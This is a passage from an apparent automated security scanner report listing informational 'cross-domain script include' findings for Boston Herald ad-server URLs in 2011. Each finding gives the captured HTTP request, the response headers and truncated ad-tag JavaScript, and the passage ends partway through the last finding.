Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/columnists/view.bg?articleid=1366212
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.6.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:01:02 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O1021J78|O2021J7A|O1021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:01:02 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1541
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/columnists/article/L48/2190420/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2190420?" type="text/javascript"></script>
...[SNIP]...

18.77. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Right  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Right

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Right HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fcolumnists%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O10226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.9.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:01:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 607
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_160x600_ATF | http://www.bostonherald.com/ | 160 x 600 Wide Skyscraper -->\n');
document.write ('<script type="text/javascript">\n');

...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.78. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fcolumnists%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.6.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:01:03 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O2021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:01:03 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1518
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/columnists/article/L48/982739986/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=982739986?" type="text/javascript"></script>
...[SNIP]...

18.79. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.21.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:05 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728x90_ROS | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.80. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.18.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O2021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:03 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; expires=Tue, 17-Sep-13 01:04:03 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1491
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/1951952197/Middle/BostonHerald/quadrant1_newsROS300x250a_2010/quadrant1_newsROS300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1951952197?" type="text/javascript"></script>
...[SNIP]...

18.81. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.41.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_300x250_ATF | http://www.bostonherald.com/ | 300 x 250 Sidekick -->\n');
document.write ('<script type="text/javascript">\n');
documen
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.82. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO101yed8|O1021J7A; expires=Tue, 17-Sep-13 01:00:05 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1506
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356?" type="text/javascript"></script>
...[SNIP]...

18.83. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.18.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O2021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_300x250_ROS | http://www.bostonherald.com/ | 300 x 250 Sidekick -->\n');
document.write ('<script type="text/javascript">\n');
documen
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.84. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO1021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:00:05 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1462
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464?" type="text/javascript"></script>
...[SNIP]...

18.85. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.18.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O2021J3t|O2021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728X90_ATF | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.86. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.42.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728x90_ROS | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.87. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle1&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.42.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_300x250_ROS | http://www.bostonherald.com/ | 300 x 250 Sidekick -->\n');
document.write ('<script type="text/javascript">\n');
documen
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.88. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.41.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

